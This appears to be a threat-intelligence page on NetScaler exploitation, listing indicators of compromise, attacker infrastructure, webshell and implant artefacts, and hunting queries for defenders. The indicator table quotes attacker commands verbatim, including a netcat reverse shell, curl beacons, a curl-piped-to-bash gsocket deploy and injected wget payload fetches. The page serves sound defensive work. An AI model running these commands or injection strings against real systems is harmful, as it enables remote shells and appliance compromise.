File path/var/tmp/.nsmon/.stateArctic Wolf [36]nsmon.pl state file used to check whether a recorded process is still runningArctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor.Public GitHub repository, no TLP marking
URI path/logon/LogonPoint/custom/receiver.min..cssSygnia [37]Request path as listed by Sygnia (two dots), consistent with the receiver.min.<hex>.css webshell aliasSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
Log stringpitboss PPE unexpectedly died NSPPE;Sygnia [37]Sygnia confidence High: new command-injection variantSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
Log stringpitboss PPE missed too many heartbeats NSPPE;Sygnia [37]Sygnia confidence High: heartbeat loader variantSygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking.Public advisory, no TLP marking
IPv4195.123.233.245TENEX [38]Primary Platypus C2 node (443); entretiensol.com and white-guard.pro resolve hereTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
IPv438.180.81.157TENEX [38]C2 node sharing the cluster certificateTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
IPv495.133.231.109TENEX [38]C2 node sharing the cluster certificateTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
IPv4104.200.67.56TENEX [38]C2 node sharing the cluster certificateTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Domainwhite-guard.proTENEX [38]Resolves to the primary C2 nodeTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Domaingaryvard.comTENEX [38]Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Domainhickoryusedauto.comTENEX [38]Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Domaingurerasfalt.comTENEX [38]Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Domainrockinroyaltykids.comTENEX [38]Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Domaincurrydownsrvpark.comTENEX [38]Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
TLS cert SHA-25638b7c597c3f33f2caa2b2de9873f15cf9cb9984b0eacb801ef4b654a96ba9bd0TENEX [38]Shared cluster certificate (subject platypus-ingress, issuer Platypus project default); ties the four C2 nodes togetherTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Cert URI SANplatypus://server/defaultTENEX [38]Platypus framework certificate identity scheme; hunt by pattern, not only the exact fingerprintTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Signing keyS8GEj/Ibzw/Zy9Z5u4saQyn0h59enf9Mk3J2m70tTMs=TENEX [38]Ed25519/minisign public key embedded in every agent build; the best cross-build pivotTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Build fingerprint0.1.0-SNAPSHOT-4b91c7dbTENEX [38]Newer agent build, compiled 2026-09-28TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Build fingerprint0.1.0-SNAPSHOT-697ffe7cTENEX [38]Earlier agent build, compiled 2026-09-08, same operator signing keyTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
SHA-256c98aee75c5e199c9b5527984ce48675d665963f7cab8ce9f2e82465de6b58727TENEX [38]Platypus agent, freebsd/amd64 (the appliance-relevant build)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
SHA-25689b64bd45478e53299f9c422cbba40fac3ac0712b551b85185e38203f7f984c6TENEX [38]Platypus agent, linux/amd64 (current build)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
SHA-256be5832f3993ff63a36100b2f7b89c8d385e20dd9d72876700e7ade9fb9e6d4cbTENEX [38]Platypus agent, UPX-packed Linux x86-64; earlier buildTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
SHA-2560dcac605a3a0c37001552369a6a77003226b35ddee7710b554fcd0e6809a76d1TENEX [38]Platypus agent, windows/amd64TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
SHA-25604db3fc44c81886844ef47949d7f352953a6bf1be4866be1fb3e7e12c452e3acTENEX [38]Platypus agent, darwin/arm64TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
SHA-2562d2c2f6842982f7e1cb894ce915d39f2a9861009c7ecb1b90da803f2c3c608f4TENEX [38]Platypus agent, linux/amd64 unpacked (more stable than the packed hashes)TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
HTTP requestPOST /api/v1/agents/enroll with Content-Type application/x-protobuf-platypus-v2TENEX [38]Platypus agent enrollment; the content type is highly distinctiveTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
URI path/api/v1/agent/linkTENEX [38]Platypus WebSocket tasking channel over mutual TLSTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Network fingerprint_platypus-mesh._tcp (mDNS, UDP/5353)TENEX [38]LAN peer discovery in cleartext; the easiest way to find a second infected host on the same segmentTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
User-Agentplatypus-agent/public-ip-probeTENEX [38]Platypus agent public-IP probeTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
File path/netscaler.local/TENEX [38]Operator-created binary directory, not part of the stock NetScaler layoutTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
File namens_*.plTENEX [38]Agent renamed as a NetScaler-style Perl script; the number is per install, so hunt the pattern and check contentTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
File path/var/core/.ns-cache/ (client.crt, client.key, agent.lock, state.db)TENEX [38]Agent working directory; the client certificate and key exist only if enrollment completed, and they survive a firmware upgradeTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
Usernamescanner-probeTENEX [38]Submitted to the authentication virtual server for reconnaissance just before the injection attemptsTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
File path/.xTENEX [38]Stager written by the injected shell-loader command and then run with shTENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived.Public blog, no TLP marking
IPv4199.233.217.13TENEX [38]Check-in over TCP/8080 (/hi, /hi/<ip>) and a netcat reverse shell to TCP/8000TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator.Public blog, no TLP marking
IPv4130.94.20.222TENEX [38]Silent beacon to :8888/c/<hex>TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator.Public blog, no TLP marking
Commandnc 199.233.217.13 8000 -e /bin/shTENEX [38]Netcat reverse shellTENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator.Public blog, no TLP marking
Commandcurl http://199.233.217.13:8080/hi/TENEX [38]Attacker check-in to fresh infrastructureTENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator.Public blog, no TLP marking
Commandcurl -m 8 -sk http://130.94.20.222:8888/c/<hex> -o /dev/nullTENEX [38]Silent beacon that confirms reachability without saving outputTENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator.Public blog, no TLP marking
Commandbash -c $(curl -fsSL https://gsocket.io/y)TENEX [38]One-line Global Socket Toolkit deploy with an S=<hex> key. gsocket.io is a legitimate service abused here, so do not block the domainTENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator.Public blog, no TLP marking
Commandwhoami; id>/netscaler/ns_gui/vpn/id009.txt; id>/netscaler/ns_gui/id009.txtTENEX [38]Execution check that writes id output to a web-readable appliance pathTENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator.Public blog, no TLP marking
File path/var/tmp/watchTowrwatchTowr Detection Artefact Generator [29]README example output path of the CVE-2026-88771 detection tool (id>/var/tmp/watchTowr)Test marker from a public watchTowr detection tool (README example path). A hit means someone ran the tool, possibly a defender, not necessarily an attacker. The operator can choose any path.Public GitHub repository, no TLP marking
File path/tmp/watchTowrwatchTowr Detection Artefact Generator [31]README example output path of the CVE-2026-88772 (DTLS) detection tool; the example writes a 7-byte fileTest marker from a public watchTowr detection tool (README example path). A hit means someone ran the tool, possibly a defender, not necessarily an attacker. The operator can choose any path.Public GitHub repository, no TLP marking
Log stringpitboss PPE unexpectedly died NSPPE;printf wt88771mbw9drneqklf>/var/netscaler/logon/themes/wt88771mbw9drneqklf.txt;# Xr/Citrix [109]Injected username that writes a marker file into the logon themes directory (execution test)Single Reddit commenter, unverified. The wt88771 prefix with a random suffix looks like a detection canary, but it does not appear in watchTowr's published tool or write-up, so do not attribute it to watchTowr. Treat as a hunting lead.Public Reddit comment
File path/var/netscaler/logon/themes/wt88771mbw9drneqklf.txtr/Citrix [109]Marker file created by the command above; hunt for wt88771*.txt under /var/netscaler/logon/themes/Single Reddit commenter, unverified. The wt88771 prefix with a random suffix looks like a detection canary, but it does not appear in watchTowr's published tool or write-up, so do not attribute it to watchTowr. Treat as a hunting lead.Public Reddit comment
Log stringpitboss PPE unexpectedly died NSPPE;wget http://31.56.197.72:9090/lula;# Xr/Citrix [109]; LevelBlue SpiderLabs (THOR team) [42]Payload retrieval from 31.56.197.72, also described by LevelBlue; the same host appears in the Arctic Wolf and TENEX dataSingle Reddit commenter, unverified. The wt88771 prefix with a random suffix looks like a detection canary, but it does not appear in watchTowr's published tool or write-up, so do not attribute it to watchTowr. Treat as a hunting lead. The wget line itself matches LevelBlue's published example.Public Reddit comment
IPv4213.209.159.55Beaumont, Oct 2 19:01 UTC [74]; VirusTotal [58]; Poppelgaard [39]Named as the payload server in screenshots of a write-up attached to the Beaumont post (author not named): crafted SAML-factor usernames on two 14.1-73.37 appliances made them fetch a payload from it over plain HTTP on TCP 443 (paths under /t/), save it as /v and run it. The incoming request source was not identified. The Poppelgaard checker calls it the exfiltration host of the SAML-attack dropper "380d56" (2 Oct, community analysis). A VirusTotal community comment also says a Perl payload related to NetScaler exploits is hosted on this IP. AS208137, Feo Prest SRL, Germany.Unverified. The write-up itself says it shows exploitation attempts and correlated crashes, not confirmed command execution, a specific CVE or a firmware regression. No vendor or CERT has confirmed it. The payload-vs-exfiltration role differs between the two sources; each is single-source. Either role means an infected appliance would connect out to this host, so it is kept in this site's IPv4 edge blocklist as defence in depth.Public Mastodon post (screenshots)
SHA-256b9b0a4380db462c706597bd3e6a08d4d99fcbbf0919d63eb99b488d396c8ce63VirusTotal [58]Perl script (24.57 KB), first submitted to VirusTotal on 2 Oct at 17:29 UTC. THOR (Nextron) commented a Valhalla rule match, MAL_EXPL_CVE_2026_88771_Oct26 (detects a CVE-2026-88771 post-exploitation script), and a community comment says it is a NetScaler exploit payload hosted on 213.209.159.55. Shared in the w00w00 tlp-amber-citrix-du-jour thread 3 Oct ("i don't see it in the pitscaler IOC list"). Re-checked 3 Oct 16:14 UTC: 4 of 75 engines flag it (UDS:Backdoor.Win32.Tofsee, Win32.Hack.Tofsee.a, Backdoor.Perl!9.85243, Kaspersky HEUR:Backdoor/Perl.WebShell.b)Still the weaker of the two payloads: four heuristic/backdoor labels, no engine names the NetScaler campaign, and no public report ties this hash to f.pylrk.cc or the Sliver implant - it came from a different delivery host (213.209.159.55). The file content was not reviewed here, and no vendor report names it.Public VirusTotal page
SHA-2560188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027External malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59]Sliver C2 implant built for FreeBSD (the OS under NetScaler): statically linked stripped Go ELF64, 8,822,784 bytes, MD5 117ba08492fe68726dae74b40d375c28. Served over HTTPS from f.pylrk.cc/HaKi2ufpiQ8AeVTZ/host (HTTP/2 200, application/octet-stream, Cloudflare-fronted; re-verified live 3 Oct). Hardcoded C2 https://www.pylrk.cc, protocol tag pylrkfbsd, IMPLANT_CAPABILITY_TUNNEL_TERMINAL_V1 (reverse shell/tunnel), spoofed Chrome 108/Windows User-Agent for its own beacons, no embedded IP. VT filenames include /var/tmp/.host, /private/var/tmp/.host and citrix3.bad - appliance deployment paths. 31 of 75 engines on VirusTotal (3 Oct 14:25 UTC), all Sliver/Vilers-family labels; first submitted 2 Oct 11:49 UTC. A TLP:CLEAR malware analysis report (2 Oct) ties it to CVE-2026-88771 exploitation of a NetScaler Gateway, corroborated by an Expel IR observation; Expel reported netcat-style reverse callbacks in the same campaign.Vendor-independent: an external team's static analysis (sample not executed), plus Expel corroboration - strong for this campaign, but not a vendor or CERT publication. Detection labels are all Sliver/Vilers; the FreeBSD build and pylrk.cc C2 are what tie it here. Cloudflare fronts the delivery host, so block the domain and hash, not the IPs.Public VirusTotal page and TLP:CLEAR report
URL path/HaKi2ufpiQ8AeVTZ/hostExternal malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59]Delivery path of the FreeBSD Sliver implant on f.pylrk.cc:443 (HTTPS, HTTP/2 200, application/octet-stream, 8,822,784 bytes); live and unchanged 3 Oct, per the TLP:CLEAR malware analysis report and re-verified directlyPath is random-looking and may rotate; hunt it in proxy logs together with the f.pylrk.cc hostname. A negative result proves nothing - the file may be served from other paths.Public VirusTotal page and TLP:CLEAR report
File path/var/tmp/.host (and /private/var/tmp/.host)External malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59]Filename VT records for the FreeBSD Sliver implant, consistent with deployment on a NetScaler/FreeBSD appliance; citrix3.bad is another recorded nameFrom VT filename metadata and the external report, not from IR on a victim appliance; a missing file does not rule out compromise. /tmp and /var/tmp clear on reboot.Public VirusTotal page and TLP:CLEAR report
Domainpylrk.ccPoppelgaard [40]; Poppelgaard [39]; Beaumont, Oct 2 19:01 UTC [74]; External malware analysis report (TLP:CLEAR, 2 Oct) [41]C2 and payload-delivery domain: registered 2 Oct 06:56 UTC (NameSilo, Cloudflare NS). Poppelgaard reported it as a download server seen in attack attempts on 2 Oct (article and checker release 1.11). The FreeBSD Sliver implant served from f.pylrk.cc carries a hardcoded C2 reference to https://www.pylrk.cc and resolves its C2 via this domain (TLP:CLEAR malware analysis report, corroborated by Expel). The write-up screenshotted in the Beaumont post spells it *.pyrlink.cc in an edit ("Block that too"), but that domain is not registered; the screenshots also do not name the delivery host, so the two spellings may describe the same host. Passive DNS shows f.pylrk.cc A records from 2 Oct 11:50 UTC on Cloudflare proxy IPs (104.21.30.48 / 172.67.150.149); www.pylrk.cc also resolves there, the apex has no A record. Re-checked live 3 Oct.Malware-role now multi-source (checker, MAR, Expel corroboration, embedded C2 string in the implant). VirusTotal: 1 of 91 engines flags the apex and f.pylrk.cc - weak as always on fresh infrastructure. The spelling *.pyrlink.cc from the screenshots is unregistered. Cloudflare-fronted: block the domain name, not the resolved IPs (shared with millions of sites).Public blog, GitHub release and TLP:CLEAR report
Domainf.pylrk.ccExternal malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59]Payload-delivery subdomain of pylrk.cc: served the FreeBSD Sliver implant (8,822,784 bytes) at /HaKi2ufpiQ8AeVTZ/host over HTTPS, per the TLP:CLEAR malware analysis report (2 Oct, corroborated by Expel) and the report author's Slack post ("I get a different payload from https://f.pylrk[.]cc/HaKi2ufpiQ8AeVTZ/host"). First seen in passive DNS 2 Oct 11:50 UTC on Cloudflare proxy IPs; Let's Encrypt certificate CN=pylrk.cc issued 2 Oct 06:01 UTC; still serving 3 Oct (re-verified). Root path returns a minimal placeholder page (<h1>c</h1><p>ok</p>).Multi-source and independently verifiable, but vendor-independent - not a vendor or CERT publication. Cloudflare-fronted: block the hostname, never the proxy IPs. Subdomains under pylrk.cc may rotate; hunt *.pylrk.cc in DNS logs rather than this single host.Public VirusTotal page and TLP:CLEAR report
Domainoast.funPoppelgaard [39]Domain in the Poppelgaard checker v1.11 DNS-hunt list (14 domains); the checker does not state which source observed it or what it servedLow confidence and dual use: oast.fun is a known out-of-band-testing domain family used by security tooling (Interact.sh-style OAST callbacks), so a hit can be a researcher's or pentester's test, not the actor. Hunting lead only; do not block without context.Public GitHub repository, no TLP marking
Domaindnsl.ccPoppelgaard [39]Domain in the Poppelgaard checker v1.11 DNS-hunt list (14 domains); the checker does not state which source observed it or what it servedSingle compiled list; no public source describes this domain's role in the campaign. A short generic domain whose ownership is privacy-redacted. Hunting lead only.Public GitHub repository, no TLP marking
Domaings.thc.orgPoppelgaard [39]; TENEX [38]Domain in the Poppelgaard checker v1.11 DNS-hunt list (14 domains); the checker does not state which source observed it or what it servedLow confidence and dual use: thc.org subdomains are associated with the Hacker's Choice gsocket reverse-shell tooling, which is used by both penetration testers and attackers (TENEX lists gsocket in the same campaign - see the gsocket rows). A hit needs correlation with other indicators before it means anything. Hunting lead only.Public GitHub repository, no TLP marking
File path/vBeaumont, Oct 2 19:01 UTC [74]; Poppelgaard [40]Payload file the injected commands save at the filesystem root and execute (same write-up) Poppelgaard separately describes a bot sending fetch -qo /v with an http URL on port 443 and then sh /v, using IFS instead of spaces.Unverified. A missing /v does not rule out earlier execution or cleanup, as the write-up itself notes.Public Mastodon post (screenshots)
URI path/t/Beaumont, Oct 2 19:01 UTC [74]; Poppelgaard [40]Paths under /t/ on 213.209.159.55:443 (plain HTTP) used for the payload downloads Poppelgaard describes the same /t/<hex> download path from a bot.Unverified, single write-up. A short generic path, so only meaningful together with the IP.Public Mastodon post (screenshots)
File namensaaad-*.gzBeaumont, Oct 2 19:01 UTC [74]Core dumps of the authentication daemon in recently modified numbered directories under /var/core after repeated crashes (exit status 0x8a, restart limit 6, then a reboot)Unverified. Crashes have other causes; a match is a reason to preserve logs and cores and involve Citrix Support, not proof of compromise.Public Mastodon post (screenshots)
File path/nsconfig/.slap/ and /flash/nsconfig/.slap/Poppelgaard [39]Perl agent/bridge directory of the kit the SAML attack tries to install (dropper "380d56", community analysis per the Poppelgaard checker v1.10); persists across rebootsSingle-source community analysis compiled in the Poppelgaard checker; no vendor or CERT has published these paths. A hunting lead, not proof of compromise.Public GitHub repository, no TLP marking
File path/var/tmp/.ux/Poppelgaard [39]Staging directory for slapshot.py (listens on 127.0.0.1:9909) and whipd.py (listens on 0.0.0.0:9910) of the SAML-attack kit per the Poppelgaard checker v1.10Single-source community analysis compiled in the Poppelgaard checker; no vendor or CERT has published these paths or ports. Local-only ports can be legitimate; correlate with the other kit artefacts.Public GitHub repository, no TLP marking
File name.slap.receiver / .ctxs.receiver / receiver.deb in LogonPoint/customPoppelgaard [39]; GreyNoise blog [53]PHP webshell variants of the SAML-attack kit (fake 404 responses, command in a cookie, fixed token), with a receiver.v2.min[.<hex>].css alias and an /etc/httpd.conf.slap.bak config backup, per the Poppelgaard checker v1.10Single-source community analysis compiled in the Poppelgaard checker. Overlaps the publicly documented .ctxs.receiver webshell; treat new variants as leads and match on file content, not names.Public GitHub repository, no TLP marking
File path/var/tmp/.slap-agent.log, .slap-httpd-test.log, .slap-diag.txt, .s2loot, /tmp/.slap.cronPoppelgaard [39]Log and staging artefacts of the SAML-attack kit per the Poppelgaard checker v1.10; persistence via rc.netscaler and root crontab (agent every minute, .slap/boot.sh every 5 minutes)Single-source community analysis compiled in the Poppelgaard checker; no vendor or CERT has published these artefacts. A hunting lead.Public GitHub repository, no TLP marking
SHA-25672cff13fcba75504485e94fa6bfc5e9363e860f49efdba68feb583148eec38f2Poppelgaard [39]Dropper "380d56" of the SAML-attack kit, listed in the Poppelgaard checker v1.10 (community analysis). VirusTotal on 2 Oct: Perl file, 1 of 75 engines maliciousSingle-source community analysis; no vendor or CERT has confirmed the hash, and the VirusTotal score is weak evidence (one heuristic label, 1/75).Public GitHub repository, no TLP marking
Config patternadd authentication samlAction.*Citrix community blog [2]Citrix: an appliance with this line in its configuration is affected by the new SAML issue, per the applicability check in Citrix's guidanceApplicability check from Citrix, not an indicator of compromise.Public vendor blog, no TLP marking
Config patternadd authentication samlIdPProfile.*Citrix community blog [2]Citrix: an appliance with this line in its configuration is affected by the new SAML issue, per the applicability check in Citrix's guidanceApplicability check from Citrix, not an indicator of compromise.Public vendor blog, no TLP marking
Log patternproc nsaaad.*(SIGNALED|EXITED)|maximum number of restarts|Pitboss declaring system failure|All monitored processes have exited, rebootingBeaumont, Oct 2 19:01 UTC [74]Grep from the Beaumont post for authentication-daemon crashes and the resulting restart or reboot, run against /var/log/ns.logBeaumont own pattern. A match means the daemon crashed or the appliance restarted, which has other causes too; it is not proof of an attack.Public Mastodon post

The 2 October SAML-issue payload chain: f.pylrk.cc and the FreeBSD Sliver implant

A TLP:CLEAR malware analysis report (2 October, vendor-independent, corroborated by an Expel IR observation) and the delivery host's live state connect the new-issue delivery domain to an actual implant:

The report is a static analysis (sample not executed) by an external team, not a vendor or CERT publication. Cloudflare fronts the delivery host: block the domain names and the hash, never the resolved proxy IPs. Hunt *.pylrk.cc in DNS logs rather than the single hostname - subdomains may rotate. [41]

Post-exploitation steps attempted on a GreyNoise sensor

GreyNoise says the attacker did not gain a foothold on its sensor. The steps below show the attacker's playbook, not a successful compromise.

A Reddit user described one sample of the .ctxs.receiver file, and IFIN relayed the description. This is unconfirmed. [57]

The token likely differs per victim, so search the file's content rather than relying on its hash.

Source: GreyNoise, "Swarming Against Citrix 0-Day Exploitation". Victim-specific names and IPs from later IR-vendor writeups are deliberately left out. Beaumont warns that publishing them exposes organisations that have not yet remediated. [70]

Detection and hunting for NetScaler compromise

In short: review httpd.conf for PHP handler and AliasMatch changes, look for PHP files in VPN script and media directories, check /bin/sh for setuid, and correlate DTLSv1.0 handshake failures with NSPPE crashes. Sources: GTIG/Mandiant, CERT-EU and GreyNoise, as of 30 September 2026. [34][27]

A clean scan does not clear a host. A checker can miss a planted webshell, especially when logs have rotated or permissions were changed.

TENEX: finding the Platypus agent Network and host

  • On the appliance: /netscaler.local/ and a Perl-named ns_*.pl that is not a real appliance script, and /var/core/.ns-cache/ holding client.crt and client.key (present only if the agent enrolled).
  • On the network: POST /api/v1/agents/enroll with an application/x-protobuf-platypus-v2 content type, a WebSocket to /api/v1/agent/link over mutual TLS, and the _platypus-mesh._tcp mDNS service on UDP/5353, which also finds a second infected host on the segment.
  • Pivot on the shared cluster certificate, its public-key hash or the embedded signing key, not on file hashes: the operator rebuilds, so hashes are short-lived.
  • An upgrade keeps persistent storage, so the agent's files survive patching. A fixed build tells you it was patched, not that it is clean.

Source: TENEX. Appliance logs show attempts reaching the handler, not that commands ran.

Poppelgaard checker Script, v1.11

A free, read-only shell script for the appliance (sh ctx697096_check.sh --ioc) that checks fixed-build status and public indicators, and tags each attack line as before or after the fix. Release 1.11 (2 Oct) adds a SAML status check based on Citrix's new guidance. Release 1.9 (1 Oct) adds Arctic Wolf's nsmon.pl implant, the Unit 42 .deb webshell and more attacker IPs. Its author says a clean result is not proof of a clean box; run it before rebooting or upgrading, and use it together with the Citrix IoC scan.

Source: Poppelgaard on GitHub. A third-party tool; read it before you run it on a production appliance.

New SAML issue (2 Oct) Citrix guidance

  • Check your configuration for add authentication samlAction.* and add authentication samlIdPProfile.*. Citrix says an appliance with either, on a Gateway or AAA virtual server, is affected. [2]
  • Beaumont's grep for authentication-daemon crashes and restarts in /var/log/ns.log: proc nsaaad.*(SIGNALED|EXITED)|maximum number of restarts|Pitboss declaring system failure|All monitored processes have exited, rebooting. A match is a lead, not proof. [74]
  • The write-up screenshotted in that post also suggests: preserve the logs and any nsaaad-*.gz cores (ls -lt /var/core), check for a file /v, and check outbound firewall records for connections to 213.209.159.55:443 and *.pyrlink.cc (sic — the screenshot's spelling; the registered domain is pylrk.cc). It stresses that a negative search covers only retained logs and that attempts are not confirmed execution. Unverified, author not named. [74]
  • Citrix has released a responder policy as a mitigation, distributed through Citrix Support (3 October, under NDA). It is not in the public post yet. The Poppelgaard checker verifies whether it is bound, alongside the earlier RSP_POL_DROP and community pol_samlauth_block_v2 policies, and warns when a policy is bound but the Responder feature is disabled - the policy is then silently ignored. Beaumont reports the Support-shared policy "doesn't work for me" (Oct 2) and that "the Citrix support mitigations don't appear to work" (Oct 3). [39]
  • On Citrix's post, a commenter (Jens Dellner) asks why Citrix has not published a Global Deny List of known-malicious IPs for this issue; Citrix has not replied. The site's blocklists are a partial stand-in, built only from public IoCs. [2]
  • Block *.pylrk.cc inbound and outbound (this site's recommendation, matching NCSC-NL's guidance of 3 October): inbound, the actor uses the domain as a payload-delivery source for the SAML attack; outbound, the FreeBSD Sliver implant found on compromised appliances beacons to it as C2 (hardcoded https://www.pylrk.cc in the implant, which also resolves its C2 via DNS). Use the domain blocklist (plain version). Never block the resolved Cloudflare proxy IPs — block the DNS name. Hunt rather than only block: DNS and proxy logs for *.pylrk.cc tell you whether an appliance reached the domain before your block was in place.

Citrix says this is independent of CTX697096 and a bulletin is planned. Check the Citrix post for updates.

Unit 42 hunting query XQL

Stage 1 of the CVE-2026-88771 chain writes a Base64 dropper from the User-Agent into /var/log/httpaccess-vpn.log; stage 2 poisons /var/log/ns.log with a fake pitboss message. Unit 42's Cortex XQL query groups the commands found after NSPPE. A hit is log poisoning, not proof of execution on a patched device; on an unpatched device the poisoned entry will run.

dataset = citrix_adc_raw // replace with citrix_netscaler_raw if required
| filter _raw_log contains "pitboss"
| alter log_type = arrayindex(regextract(_raw_log, "<[^>]+>(?:[A-Za-z]{3}[ ]+[0-9]{1,2}[ ]+|[ ]+[0-9]{2}/[0-9]{2}/[0-9]{4}:)[0-9]{2}:[0-9]{2}:[0-9]{2}.+default ([\w]+)"), 0),
log_sub_type = arrayindex(regextract(_raw_log, "<[^>]+>(?:[A-Za-z]{3}[ ]+[0-9]{1,2}[ ]+|[ ]+[0-9]{2}/[0-9]{2}/[0-9]{4}:)[0-9]{2}:[0-9]{2}:[0-9]{2}.+default [\w]+ ([\w]+)"), 0),
command_attempted = arrayindex(regextract(_raw_log, "pitboss PPE unexpectedly died NSPPE(?:\-00|)\;(.+)\>, factor"), 0)
| filter command_attempted != null
| comp earliest(_time) as first_seen, latest(_time) as last_seen, values(log_type) as log_type, count() by command_attempted

Source: Unit 42 threat brief

LevelBlue behaviour signals Not independently confirmed

  • Authentication fields with pitboss, NSPPE, unexpectedly died or ${IFS} next to curl, wget, whoami, perl, python, tar or cat. A command-substitution variant uses backticks instead of semicolons.
  • New .local_journal, insight-new.js or xua.html under /var/netscaler/logon/.
  • Access to or archiving of /flash/nsconfig, and a sec_monitor superuser in ns.conf.
  • Changes to /var/python/bin/customsnmpd, and /bin/sh set to 6555.

Source: LevelBlue SpiderLabs; The Hacker News covers the same findings. [87]

Beazley: where to look Startup and scheduled jobs

